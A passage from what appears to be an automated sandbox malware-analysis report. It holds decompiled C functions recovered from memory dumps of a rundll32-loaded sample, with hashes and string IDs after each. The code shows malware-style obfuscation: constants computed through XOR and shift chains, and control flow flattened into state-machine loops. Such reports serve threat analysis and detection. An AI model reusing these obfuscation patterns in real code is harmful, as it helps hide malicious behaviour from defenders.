                                                                                                                      						_t133 = E002B5E0B( *((intOrPtr*)(_t160 + 0x24)), _t137, _v28, _v24);
                                                                                                                      						if(_t133 != _v8) {
                                                                                                                      							_t159 = _t160;
                                                                                                                      						} else {
                                                                                                                      							 *((intOrPtr*)(_t160 + 0xc))( *((intOrPtr*)(_t160 + 0x30)), 0, 0);
                                                                                                                      							E002BF88A(_v44, _v32, _v12,  *((intOrPtr*)(_t160 + 0x30)));
                                                                                                                      							E002C4DAD(_v56, _v52,  *((intOrPtr*)(_t160 + 0x24)), _v48, _v16);
                                                                                                                      							_t161 = _t161 + 0x14;
                                                                                                                      							goto L4;
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      				return _t133;
                                                                                                                      			}



























                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: =p5$?.$UGX
                                                                                                                      • API String ID: 0-1320111276
                                                                                                                      • Opcode ID: 4d29e631e8c925ebd7d64bdd655efb1fa7d93b720f8ce557a652a7ac694f019a
                                                                                                                      • Instruction ID: 4a836b1e679d167fcbe8e74f3c6f1da01387d57b05313af6b60afa701453c014
                                                                                                                      • Opcode Fuzzy Hash: 4d29e631e8c925ebd7d64bdd655efb1fa7d93b720f8ce557a652a7ac694f019a
                                                                                                                      • Instruction Fuzzy Hash: 2F512F72D01309EBCB54CFA4D98A9DEBFB2FF48328F208159D502B6260D3B51A55CF94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E002BC850(intOrPtr* __ecx) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				intOrPtr _v68;
                                                                                                                      				char _v328;
                                                                                                                      				char _t126;
                                                                                                                      				void* _t128;
                                                                                                                      				signed int _t129;
                                                                                                                      				void* _t133;
                                                                                                                      				signed int _t135;
                                                                                                                      				signed int _t136;
                                                                                                                      				char* _t137;
                                                                                                                      				intOrPtr* _t154;
                                                                                                                      
                                                                                                                      				_v64 = _v64 & 0x00000000;
                                                                                                                      				_v60 = _v60 & 0x00000000;
                                                                                                                      				_v68 = 0xeb7817;
                                                                                                                      				_v44 = 0x4dbb17;
                                                                                                                      				_v44 = _v44 >> 3;
                                                                                                                      				_v44 = _v44 ^ 0x000af917;
                                                                                                                      				_v12 = 0xca90c;
                                                                                                                      				_v12 = _v12 >> 0xf;
                                                                                                                      				_v12 = _v12 >> 0xe;
                                                                                                                      				_v12 = _v12 | 0x67e1d035;
                                                                                                                      				_v12 = _v12 ^ 0x67ebacbe;
                                                                                                                      				_v32 = 0xdd0ad5;
                                                                                                                      				_v32 = _v32 >> 6;
                                                                                                                      				_v32 = _v32 >> 0xc;
                                                                                                                      				_v32 = _v32 ^ 0x00040440;
                                                                                                                      				_v16 = 0xaefc2a;
                                                                                                                      				_v16 = _v16 ^ 0x05a88ae0;
                                                                                                                      				_t154 = __ecx;
                                                                                                                      				_t135 = 0x4a;
                                                                                                                      				_v16 = _v16 / _t135;
                                                                                                                      				_v16 = _v16 | 0x6472a2d9;
                                                                                                                      				_v16 = _v16 ^ 0x647c73c3;
                                                                                                                      				_v8 = 0x7aea22;
                                                                                                                      				_t136 = 0x5f;
                                                                                                                      				_v8 = _v8 * 0x1d;
                                                                                                                      				_v8 = _v8 >> 0xa;
                                                                                                                      				_v8 = _v8 >> 7;
                                                                                                                      				_v8 = _v8 ^ 0x0003680c;
                                                                                                                      				_v28 = 0xd7a14b;
                                                                                                                      				_v28 = _v28 >> 1;
                                                                                                                      				_v28 = _v28 | 0x0e275eed;
                                                                                                                      				_v28 = _v28 ^ 0x0e6be1b9;
                                                                                                                      				_v56 = 0x693eb0;
                                                                                                                      				_t137 =  &_v328;
                                                                                                                      				_v56 = _v56 / _t136;
                                                                                                                      				_v56 = _v56 ^ 0x00052716;
                                                                                                                      				_v52 = 0x6599ea;
                                                                                                                      				_v52 = _v52 << 8;
                                                                                                                      				_v52 = _v52 ^ 0x659cef3f;
                                                                                                                      				_v36 = 0xaf3092;
                                                                                                                      				_v36 = _v36 + 0xffffd3bf;
                                                                                                                      				_v36 = _v36 ^ 0x419856f6;
                                                                                                                      				_v36 = _v36 ^ 0x413f6f4c;
                                                                                                                      				_v40 = 0x56314e;
                                                                                                                      				_v40 = _v40 ^ 0x0d0339a4;
                                                                                                                      				_v40 = _v40 >> 5;
                                                                                                                      				_v40 = _v40 ^ 0x0068e9be;
                                                                                                                      				_v20 = 0xd689b7;
                                                                                                                      				_v20 = _v20 >> 1;
                                                                                                                      				_v20 = _v20 + 0x3668;
                                                                                                                      				_v20 = _v20 ^ 0x006dcd8c;
                                                                                                                      				_v24 = 0x36edf6;
                                                                                                                      				_v24 = _v24 + 0x231d;
                                                                                                                      				_v24 = _v24 ^ 0xb40b6ffd;
                                                                                                                      				_v24 = _v24 ^ 0xb434c03a;
                                                                                                                      				_v48 = 0x867594;
                                                                                                                      				_v48 = _v48 * 0x3a;
                                                                                                                      				_v48 = _v48 ^ 0x1e7cd6f5;
                                                                                                                      				while(1) {
                                                                                                                      					_t126 =  *_t154;
                                                                                                                      					if(_t126 == 0) {
                                                                                                                      						break;
                                                                                                                      					}
                                                                                                                      					if(_t126 == 0x2e) {
                                                                                                                      						 *_t137 = 0;
                                                                                                                      					} else {
                                                                                                                      						 *_t137 = _t126;
                                                                                                                      						_t137 = _t137 + 1;
                                                                                                                      						_t154 = _t154 + 1;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					L6:
                                                                                                                      					_t128 = E002C59B7(_v44, _v12,  &_v328, _v32);
                                                                                                                      					_t155 = _t128;
                                                                                                                      					if(_t128 != 0) {
                                                                                                                      						L8:
                                                                                                                      						_t129 = E002CFE5E(_v56, _t154 + 1, _v52, _v36);
                                                                                                                      						_push(_v48);
                                                                                                                      						_push(_v24);
                                                                                                                      						_push(_v20);
                                                                                                                      						_push(_v40);
                                                                                                                      						return E002BF2C1(_t155, _t129 ^ 0x3e95e426);
                                                                                                                      					}
                                                                                                                      					_t133 = E002CF949(_v16, _v8,  &_v328, _v28);
                                                                                                                      					_t155 = _t133;
                                                                                                                      					if(_t133 != 0) {
                                                                                                                      						goto L8;
                                                                                                                      					}
                                                                                                                      					return _t133;
                                                                                                                      				}
                                                                                                                      				goto L6;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "z$Lo?A$N1V
                                                                                                                      • API String ID: 0-1513724126
                                                                                                                      • Opcode ID: 4560ea773100d6c33708da93f2f605071fff66f43b738e700dd77952ab7016f5
                                                                                                                      • Instruction ID: f15ce37537d82f5b0f91f4242a758a0c60b474a5e20f16a69c3e10ff7bd9ce29
                                                                                                                      • Opcode Fuzzy Hash: 4560ea773100d6c33708da93f2f605071fff66f43b738e700dd77952ab7016f5
                                                                                                                      • Instruction Fuzzy Hash: 4B514332C0121EEBCF09CFA5D94AAEEFBB1FB44318F208199D411B6260D7B50A19CF95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 68%
                                                                                                                      			E002BB821() {
                                                                                                                      				signed int _v4;
                                                                                                                      				unsigned int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				intOrPtr _t108;
                                                                                                                      				intOrPtr _t111;
                                                                                                                      				signed int _t113;
                                                                                                                      				signed int _t114;
                                                                                                                      				signed int _t115;
                                                                                                                      				intOrPtr* _t116;
                                                                                                                      				void* _t117;
                                                                                                                      				void* _t129;
                                                                                                                      				signed int* _t131;
                                                                                                                      
                                                                                                                      				_t131 =  &_v40;
                                                                                                                      				_v8 = 0x113b84;
                                                                                                                      				_v8 = _v8 >> 5;
                                                                                                                      				_v8 = _v8 ^ 0x00044f92;
                                                                                                                      				_v36 = 0x188bc5;
                                                                                                                      				_v36 = _v36 * 0x48;
                                                                                                                      				_v36 = _v36 + 0xffff17a0;
                                                                                                                      				_t129 = 0x184d0e0;
                                                                                                                      				_v36 = _v36 << 0xf;
                                                                                                                      				_v36 = _v36 ^ 0x33821a89;
                                                                                                                      				_v28 = 0x501440;
                                                                                                                      				_v28 = _v28 + 0x91aa;
                                                                                                                      				_v28 = _v28 ^ 0x04b9c112;
                                                                                                                      				_v28 = _v28 ^ 0x04ea9889;
                                                                                                                      				_v32 = 0xb3d9a7;
                                                                                                                      				_t113 = 0x1d;
                                                                                                                      				_v32 = _v32 * 0x13;
                                                                                                                      				_v32 = _v32 * 0x6a;
                                                                                                                      				_v32 = _v32 ^ 0x86e7717c;
                                                                                                                      				_v40 = 0x7a3277;
                                                                                                                      				_t30 =  &_v40; // 0x7a3277
                                                                                                                      				_v40 =  *_t30 * 0x26;
                                                                                                                      				_v40 = _v40 + 0x92c7;
                                                                                                                      				_v40 = _v40 << 6;
                                                                                                                      				_v40 = _v40 ^ 0x89042107;
                                                                                                                      				_v12 = 0xe6e512;
                                                                                                                      				_v12 = _v12 / _t113;
                                                                                                                      				_v12 = _v12 ^ 0x0000e0e8;
                                                                                                                      				_v16 = 0xf852d4;
                                                                                                                      				_t114 = 0x7e;
                                                                                                                      				_v16 = _v16 / _t114;
                                                                                                                      				_v16 = _v16 ^ 0x2a7b237e;
                                                                                                                      				_v16 = _v16 ^ 0x2a71b8af;
                                                                                                                      				_v20 = 0xa37a15;
                                                                                                                      				_v20 = _v20 + 0xffff21a5;
                                                                                                                      				_v20 = _v20 >> 0xb;
                                                                                                                      				_v20 = _v20 ^ 0x000b71fe;
                                                                                                                      				_v4 = 0x3aba4b;
                                                                                                                      				_v4 = _v4 ^ 0x2eee7843;
                                                                                                                      				_v4 = _v4 ^ 0x2ed9fad0;
                                                                                                                      				_v24 = 0x4dcf39;
                                                                                                                      				_t115 = 0x4a;
                                                                                                                      				_v24 = _v24 / _t115;
                                                                                                                      				_v24 = _v24 << 0xe;
                                                                                                                      				_v24 = _v24 ^ 0x434ce119;
                                                                                                                      				_t116 =  *0x2d5208; // 0x0
                                                                                                                      				do {
                                                                                                                      					while(_t129 != 0x184d0e0) {
                                                                                                                      						if(_t129 == 0x7e35d81) {
                                                                                                                      							_t108 = E002C4EFF(E002C99AA, _v16, _t116, _t116, _v20, _v4, _t116, _v24, 0);
                                                                                                                      							_t116 =  *0x2d5208; // 0x0
                                                                                                                      							 *((intOrPtr*)(_t116 + 0x14)) = _t108;
                                                                                                                      						} else {
                                                                                                                      							if(_t129 != 0xb90d6f1) {
                                                                                                                      								goto L6;
                                                                                                                      							} else {
                                                                                                                      								_push(_v12);
                                                                                                                      								_push(_v40);
                                                                                                                      								_t111 = E002C11FC(_v32);
                                                                                                                      								_t116 =  *0x2d5208; // 0x0
                                                                                                                      								_t131 = _t131 - 0xc + 0x14;
                                                                                                                      								_t129 = 0x7e35d81;
                                                                                                                      								 *_t116 = _t111;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L9:
                                                                                                                      						return 0 | _t116 != 0x00000000;
                                                                                                                      					}
                                                                                                                      					_push(_t116);
                                                                                                                      					_push(_t116);
                                                                                                                      					_t117 = 0x18;
                                                                                                                      					_t116 = E002C3512(_t117);
                                                                                                                      					_t129 = 0xb90d6f1;
                                                                                                                      					 *0x2d5208 = _t116;
                                                                                                                      					L6:
                                                                                                                      				} while (_t129 != 0x93e05db);
                                                                                                                      				goto L9;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Cx.$w2z$~#{*
                                                                                                                      • API String ID: 0-3781971293
                                                                                                                      • Opcode ID: 7420e28c65d44cf280a28d983838766ff6d4f2fa4c5b2c474636c404f7ffa515
                                                                                                                      • Instruction ID: 44258c0ba84cfaa226c8f29a2647263aa7bb68cdd2c3eeb7038b28d87304c380
                                                                                                                      • Opcode Fuzzy Hash: 7420e28c65d44cf280a28d983838766ff6d4f2fa4c5b2c474636c404f7ffa515
                                                                                                                      • Instruction Fuzzy Hash: 2E5189715093019FC308DF29E88A94BBBE1FBC8758F108A1DF595A7260D3B1DA598F87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E002B44FA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				char _v520;
                                                                                                                      				char _v552;
                                                                                                                      				signed int _v556;
                                                                                                                      				signed int _v560;
                                                                                                                      				signed int _v564;
                                                                                                                      				signed int _v568;
                                                                                                                      				signed int _v572;
                                                                                                                      				signed int _v576;
                                                                                                                      				signed int _v580;
                                                                                                                      				signed int _v584;
                                                                                                                      				signed int _v588;
                                                                                                                      				signed int _v592;
                                                                                                                      				signed int _v596;
                                                                                                                      				void* _t110;
                                                                                                                      				signed int _t116;
                                                                                                                      				signed int _t120;
                                                                                                                      				void* _t126;
                                                                                                                      				signed int _t135;
                                                                                                                      				signed int _t136;
                                                                                                                      				void* _t138;
                                                                                                                      				signed int* _t141;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_t138 = __ecx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(_t110);
                                                                                                                      				_v584 = 0x353aee;
                                                                                                                      				_t141 =  &(( &_v596)[5]);
                                                                                                                      				_t126 = 0x2b8a3ea;
                                                                                                                      				_t135 = 0x6c;
                                                                                                                      				_v584 = _v584 * 0x28;
                                                                                                                      				_v584 = _v584 | 0xfff7ffbb;
                                                                                                                      				_v584 = _v584 ^ 0xfff7ffab;
                                                                                                                      				_v560 = 0x47639d;
                                                                                                                      				_v560 = _v560 + 0xffffee4d;
                                                                                                                      				_v560 = _v560 ^ 0x00482f45;
                                                                                                                      				_v568 = 0x9954f4;
                                                                                                                      				_v568 = _v568 >> 4;
                                                                                                                      				_v568 = _v568 << 0xe;
                                                                                                                      				_v568 = _v568 ^ 0x655e48ca;
                                                                                                                      				_v572 = 0x27eb8;
                                                                                                                      				_v572 = _v572 << 0xf;
                                                                                                                      				_v572 = _v572 | 0x08d3f6f7;
                                                                                                                      				_v572 = _v572 ^ 0x4e414fab;
                                                                                                                      				_v572 = _v572 ^ 0x7197c1a5;
                                                                                                                      				_v592 = 0xd88b27;
                                                                                                                      				_v592 = _v592 | 0xcb2a0632;
                                                                                                                      				_v592 = _v592 ^ 0x61d9313a;
                                                                                                                      				_v592 = _v592 * 0x31;
                                                                                                                      				_v592 = _v592 ^ 0x90d0f268;
                                                                                                                      				_v564 = 0x1e6f95;
                                                                                                                      				_v564 = _v564 + 0xffffd458;
                                                                                                                      				_v564 = _v564 ^ 0x0016c965;
                                                                                                                      				_v556 = 0x7ec301;
                                                                                                                      				_v556 = _v556 / _t135;
                                                                                                                      				_v556 = _v556 ^ 0x0008e3f1;
                                                                                                                      				_v576 = 0xe82a72;
                                                                                                                      				_v576 = _v576 >> 7;
                                                                                                                      				_t116 = _v576;
                                                                                                                      				_t136 = 0x3f;
                                                                                                                      				_t134 = _t116 % _t136;
                                                                                                                      				_v576 = _t116 / _t136;
                                                                                                                      				_v576 = _v576 * 0x66;
                                                                                                                      				_v576 = _v576 ^ 0x00094998;
                                                                                                                      				_v596 = 0x9d9cf;
                                                                                                                      				_v596 = _v596 + 0xffff3374;
                                                                                                                      				_v596 = _v596 ^ 0xdf943dc0;
                                                                                                                      				_v596 = _v596 ^ 0x9d51af04;
                                                                                                                      				_v596 = _v596 ^ 0x42c0e9a6;
                                                                                                                      				_v580 = 0x1688bd;
                                                                                                                      				_v580 = _v580 >> 0xa;
                                                                                                                      				_v580 = _v580 + 0xf36b;
                                                                                                                      				_v580 = _v580 * 0x11;
                                                                                                                      				_v580 = _v580 ^ 0x001dff3c;
                                                                                                                      				_v588 = 0xc39d29;
                                                                                                                      				_v588 = _v588 + 0xc15a;
                                                                                                                      				_t120 = _v588 * 0x65;
                                                                                                                      				_v588 = _t120;
                                                                                                                      				_v588 = _v588 << 0x10;
                                                                                                                      				_v588 = _v588 ^ 0x49a37055;
                                                                                                                      				do {
                                                                                                                      					while(_t126 != 0x10fdd0e) {
                                                                                                                      						if(_t126 == 0x1b35a13) {
                                                                                                                      							return E002C9045(_v596, _t134,  &_v520, _t138,  &_v552, _v580, _v588);
                                                                                                                      						}
                                                                                                                      						if(_t126 != 0x2b8a3ea) {
                                                                                                                      							goto L6;
                                                                                                                      						}
                                                                                                                      						_t134 =  &_v552;
                                                                                                                      						_t120 = E002D1310(_v584,  &_v552, _v560, _v568, _v572, _v592);
                                                                                                                      						_t141 =  &(_t141[4]);
                                                                                                                      						_t126 = 0x10fdd0e;
                                                                                                                      					}
                                                                                                                      					_push(_t126);
                                                                                                                      					_t134 =  &_v520;
                                                                                                                      					_t120 = E002BAC8C(_v564,  &_v520, _v556, _v576);
                                                                                                                      					_t141 =  &(_t141[3]);
                                                                                                                      					_t126 = 0x1b35a13;
                                                                                                                      					L6:
                                                                                                                      				} while (_t126 != 0x712552c);
                                                                                                                      				return _t120;
                                                                                                                      			}

























                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: E/H$r*$:5
                                                                                                                      • API String ID: 0-3508030207
                                                                                                                      • Opcode ID: bdc7eb3c234c05e9e6cdbdc0e6f0d16dbbad6f054e1b81a557a4ca66bb56ad1d
                                                                                                                      • Instruction ID: c4516f9db0301c7ce238d543493994c46bc9618c5b0f8cdbc00c53a90df3e7b8
                                                                                                                      • Opcode Fuzzy Hash: bdc7eb3c234c05e9e6cdbdc0e6f0d16dbbad6f054e1b81a557a4ca66bb56ad1d
                                                                                                                      • Instruction Fuzzy Hash: 6D5131714083429BC748DF21C98A81FBBE1BBD8748F505A1DF09AA6221D7B18A59CF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E002BAE9A() {
                                                                                                                      				signed char _v2;
                                                                                                                      				signed int _v276;
                                                                                                                      				signed int _v280;
                                                                                                                      				char _v284;
                                                                                                                      				signed short _v320;
                                                                                                                      				intOrPtr _v324;
                                                                                                                      				intOrPtr _v328;
                                                                                                                      				intOrPtr _v332;
                                                                                                                      				signed int _v336;
                                                                                                                      				signed int _v340;
                                                                                                                      				signed int _v344;
                                                                                                                      				signed int _v348;
                                                                                                                      				signed int _v352;
                                                                                                                      				signed int _v356;
                                                                                                                      				signed int _v360;
                                                                                                                      				signed int _v364;
                                                                                                                      				void* _t93;
                                                                                                                      				signed int _t105;
                                                                                                                      				signed int _t106;
                                                                                                                      				signed int _t107;
                                                                                                                      				intOrPtr _t109;
                                                                                                                      				signed int* _t111;
                                                                                                                      
                                                                                                                      				_t111 =  &_v364;
                                                                                                                      				_v332 = 0xbc8cfe;
                                                                                                                      				_t109 = 0;
                                                                                                                      				_t93 = 0x544b857;
                                                                                                                      				_v328 = 0;
                                                                                                                      				_v324 = 0;
                                                                                                                      				_v348 = 0xa18708;
                                                                                                                      				_v348 = _v348 | 0xdf6aec5f;
                                                                                                                      				_v348 = _v348 ^ 0xdfe83fdc;
                                                                                                                      				_v356 = 0xddc275;
                                                                                                                      				_v356 = _v356 + 0xef66;
                                                                                                                      				_t105 = 0x44;
                                                                                                                      				_v356 = _v356 / _t105;
                                                                                                                      				_v356 = _v356 ^ 0x000c07d0;
                                                                                                                      				_v360 = 0xb33a69;
                                                                                                                      				_v360 = _v360 + 0x311b;
                                                                                                                      				_v360 = _v360 + 0xffff8b8d;
                                                                                                                      				_v360 = _v360 ^ 0x00b7daa7;
                                                                                                                      				_v364 = 0x70c027;
                                                                                                                      				_t106 = 0x45;
                                                                                                                      				_v364 = _v364 / _t106;
                                                                                                                      				_v364 = _v364 >> 3;
                                                                                                                      				_t107 = 0x76;
                                                                                                                      				_v364 = _v364 / _t107;
                                                                                                                      				_v364 = _v364 ^ 0x00047190;
                                                                                                                      				_v340 = 0xefeeea;
                                                                                                                      				_v340 = _v340 >> 9;
                                                                                                                      				_v340 = _v340 ^ 0x00027f77;
                                                                                                                      				_v352 = 0xde5c51;
                                                                                                                      				_v352 = _v352 + 0xffff1c5e;
                                                                                                                      				_v352 = _v352 ^ 0x00dc38de;
                                                                                                                      				_v344 = 0x59a1b5;
                                                                                                                      				_v344 = _v344 + 0xf1eb;
                                                                                                                      				_v344 = _v344 ^ 0x005dc95d;
                                                                                                                      				_v336 = 0x74ce3f;
                                                                                                                      				_v336 = _v336 + 0xffffdac0;
                                                                                                                      				_v336 = _v336 ^ 0x0079bed4;
                                                                                                                      				do {
                                                                                                                      					while(_t93 != 0x136692) {
                                                                                                                      						if(_t93 == 0x147bc0f) {
                                                                                                                      							_t93 = 0xf967eb2;
                                                                                                                      							_t109 = _t109 + _v276 * 0x64;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t93 == 0x544b857) {
                                                                                                                      								_t93 = 0x136692;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t93 == 0x6e5561d) {
                                                                                                                      									_t93 = 0xde10965;
                                                                                                                      									_t109 = _t109 + (_v2 & 0x000000ff) * 0x186a0;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t93 == 0x9c7e626) {
                                                                                                                      										E002B3D8A(_v340,  &_v320, _v352, _v344, _v336);
                                                                                                                      										_t111 =  &(_t111[3]);
                                                                                                                      										_t93 = 0x6e5561d;
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      										if(_t93 == 0xde10965) {
                                                                                                                      											_t93 = 0x147bc0f;
                                                                                                                      											_t109 = _t109 + _v280 * 0x3e8;
                                                                                                                      											continue;
                                                                                                                      										} else {
                                                                                                                      											if(_t93 != 0xf967eb2) {
                                                                                                                      												goto L16;
                                                                                                                      											} else {
                                                                                                                      												_t109 = _t109 + (_v320 & 0x0000ffff);
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L9:
                                                                                                                      						return _t109;
                                                                                                                      					}
                                                                                                                      					_v284 = 0x11c;
                                                                                                                      					E002C5A5C( &_v284, _v348, _v356, _v360, _v364);
                                                                                                                      					_t111 =  &(_t111[3]);
                                                                                                                      					_t93 = 0x9c7e626;
                                                                                                                      					L16:
                                                                                                                      				} while (_t93 != 0xf3c44c2);
                                                                                                                      				goto L9;
                                                                                                                      			}


























                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: e$e$f
                                                                                                                      • API String ID: 0-1877623186
                                                                                                                      • Opcode ID: 3bc59c3c401371c9cdb65951a26b58042382158b88ab3837599062e84b37cfbd
                                                                                                                      • Instruction ID: 93901cf2bd1ce287364c1920ddde1019b23518b1330b3e9f744327c1b2e3183c
                                                                                                                      • Opcode Fuzzy Hash: 3bc59c3c401371c9cdb65951a26b58042382158b88ab3837599062e84b37cfbd
                                                                                                                      • Instruction Fuzzy Hash: 5741CAB16183028BC718CF11D4854AFBAE1EBD4788F148A2EF59A56260D3B5CA19CF87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E002B6C29() {
                                                                                                                      				signed int _v8;
                                                                                                                      				unsigned int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				void* _v44;
                                                                                                                      				intOrPtr _v48;
                                                                                                                      				void* _t89;
                                                                                                                      				intOrPtr _t98;
                                                                                                                      				signed int _t102;
                                                                                                                      				signed int _t103;
                                                                                                                      				void* _t105;
                                                                                                                      
                                                                                                                      				_v48 = 0xcb88bc;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t102 = 0x47;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t89 = 0xf0122cf;
                                                                                                                      				asm("stosd");
                                                                                                                      				_v16 = 0x79c750;
                                                                                                                      				_v16 = _v16 + 0x2192;
                                                                                                                      				_v16 = _v16 ^ 0x37fffb71;
                                                                                                                      				_v16 = _v16 + 0xffff9df1;
                                                                                                                      				_v16 = _v16 ^ 0x3784de23;
                                                                                                                      				_v12 = 0x72aa7c;
                                                                                                                      				_v12 = _v12 * 0x4d;
                                                                                                                      				_v12 = _v12 + 0x37d5;
                                                                                                                      				_v12 = _v12 >> 4;
                                                                                                                      				_v12 = _v12 ^ 0x02292cf3;
                                                                                                                      				_v8 = 0x96e633;
                                                                                                                      				_v8 = _v8 ^ 0x4b98ff22;
                                                                                                                      				_v8 = _v8 ^ 0x9d1458e0;
                                                                                                                      				_v8 = _v8 | 0xdef8ea17;
                                                                                                                      				_v8 = _v8 ^ 0xdef824a2;
                                                                                                                      				_v28 = 0x117d;
                                                                                                                      				_v28 = _v28 / _t102;
                                                                                                                      				_v28 = _v28 >> 0x10;
                                                                                                                      				_v28 = _v28 ^ 0x00058012;
                                                                                                                      				_v24 = 0x3d67df;
                                                                                                                      				_v24 = _v24 | 0x442c4c66;
                                                                                                                      				_t44 =  &_v24; // 0x442c4c66
                                                                                                                      				_t103 = 0x76;
                                                                                                                      				_v24 =  *_t44 / _t103;
                                                                                                                      				_v24 = _v24 ^ 0x009d94f1;
                                                                                                                      				_v32 = 0x4e376f;
                                                                                                                      				_v32 = _v32 << 0xd;
                                                                                                                      				_v32 = _v32 ^ 0xc6ef13b7;
                                                                                                                      				_v20 = 0x3e602c;
                                                                                                                      				_v20 = _v20 ^ 0x8d0d4ca7;
                                                                                                                      				_v20 = _v20 << 6;
                                                                                                                      				_v20 = _v20 * 0x6d;
                                                                                                                      				_v20 = _v20 ^ 0xb2734839;
                                                                                                                      				do {
                                                                                                                      					while(_t89 != 0x600d2ee) {
                                                                                                                      						if(_t89 == 0xf0122cf) {
                                                                                                                      							_push(_t89);
                                                                                                                      							_push(_t89);
                                                                                                                      							 *0x2d5210 = E002C3512(0x138);
                                                                                                                      							_t89 = 0x600d2ee;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						goto L5;
                                                                                                                      					}
